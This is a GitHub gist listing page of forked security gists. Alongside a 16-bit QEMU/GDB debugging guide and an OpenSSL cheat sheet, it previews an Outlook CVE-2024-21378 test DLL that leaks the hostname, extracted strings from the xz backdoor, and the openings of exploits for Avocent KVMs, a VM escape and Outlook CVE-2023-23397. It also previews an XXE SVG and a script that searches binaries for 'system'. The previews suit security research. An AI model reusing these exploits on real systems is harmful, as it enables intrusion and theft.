@infernalheaven
infernalheaven / README.md
Created June 5, 2024 12:18 — forked from Theldus/README.md
The only proper way to debug 16-bit (x86) code on Qemu+GDB

The only proper way to debug 16-bit code on Qemu+GDB

(or nearly so...)

GDB is undeniably an extremely versatile debugger, with the ability to add breakpoints, watchpoints, dump memory, registers, and the source code (along with its corresponding assembly). These features make it the perfect Swiss Army knife for most programmers. In addition to that, the possibility of implementing a 'GDB Stub' and automatically supporting GDB in your application makes it an almost universal debugger for a variety of tasks.

Qemu, like other virtual machines (such as 86Box), also implements debugging via GDB Stub, which enormously facilitates the development of bootloaders, operating systems, and more. The support for 32-bit and 64-bit code is quite good, and I have never seen any complaints about it. However, for 16-bit/real mode...

Is debugging in 16-bit/real mode really that bad?

If you have ever tried to debug 16-bit code on Qemu, you know how painful it can be:

  1. GDB thinks your code is
@infernalheaven
infernalheaven / test_dll.c
Created April 13, 2024 04:48 — forked from Homer28/test_dll.c
DLL code for testing CVE-2024-21378 in MS Outlook
/**
* This DLL is designed for use in conjunction with the Ruler tool for
* security testing related to the CVE-2024-21378 vulnerability,
* specifically targeting MS Outlook.
*
* It can be used with the following command line syntax:
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
*
* After being loaded into MS Outlook, it sends the PC's hostname and
@infernalheaven
infernalheaven / hashes.txt
Created April 3, 2024 13:16 — forked from q3k/hashes.txt
liblzma backdoor strings extracted from 5.6.1 (from a built-in trie)
0810 b' from '
0678 b' ssh2'
00d8 b'%.48s:%.48s():%d (pid=%ld)\x00'
0708 b'%s'
0108 b'/usr/sbin/sshd\x00'
0870 b'Accepted password for '
01a0 b'Accepted publickey for '
0c40 b'BN_bin2bn\x00'
06d0 b'BN_bn2bin\x00'
0958 b'BN_dup\x00'
@infernalheaven
infernalheaven / xz-backdoor.md
Created March 29, 2024 22:02 — forked from thesamesam/xz-backdoor.md
xz-utils backdoor situation

FAQ on the xz-utils backdoor

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed; statistically, your average Linux or macOS system will have it installed for

@infernalheaven
infernalheaven / OpenSSL cheat sheet for socket programmers.md
Created January 9, 2024 16:29 — forked from azadkuh/OpenSSL cheat sheet for socket programmers.md
OpenSSL cheat sheet. This is a brief howto for socket programmers.

# OpenSSL cheat sheet

This is a brief howto for socket programmers.

create RSA key pairs

ex: 1024bits length key pair:

$> openssl genrsa -out myprivate.pem 1024
$> openssl rsa -in myprivate.pem -pubout -out mypublic.pem
@infernalheaven
infernalheaven / asmpwn.py
Created December 30, 2023 15:08 — forked from aemmitt-ns/asmpwn.py
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)
# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
    global socks # python closes out of scope sockets
    port = 3211 # port is hardcoded in the binary
    usernm = username.encode()
#!/usr/bin/env python
# https://www.reddit.com/r/netsec/comments/4a93eo/analysis_of_vm_escape_by_using_lua_script/d0zcsgl
import sys
import time
import getopt
import socket
'''
Gives the hexadecimal representation of "command"
@infernalheaven
infernalheaven / host_getter.svg
Created April 17, 2023 12:44 — forked from jakekarnes42/host_getter.svg
An SVG "image" that uses an XXE attack to embed the hostname file of whichever system processes it into the image itself
@infernalheaven
infernalheaven / find_symbol.sh
Created April 2, 2023 16:23 — forked from SeanPesce/find_symbol.sh
Linux shell command to find binaries that contain a specific symbol. Useful when searching for command injection and other vulnerabilities.
#!/bin/bash
SYMBOL_NAME="system"; find ./ -type f -exec printf "{}: " \; -exec sh -c "objdump -T \"{}\" 2>&1 | grep -e \" $SYMBOL_NAME\" ; echo \"\"" \; | grep -e " $SYMBOL_NAME"
@infernalheaven
infernalheaven / PidLidReminderPwn.py
Created March 28, 2023 09:41 — forked from tothi/PidLidReminderPwn.py
Exploiting Outlook CVE-2023-23397 using Python by sending the message through EWS
#!/usr/bin/python -u
from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty
from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)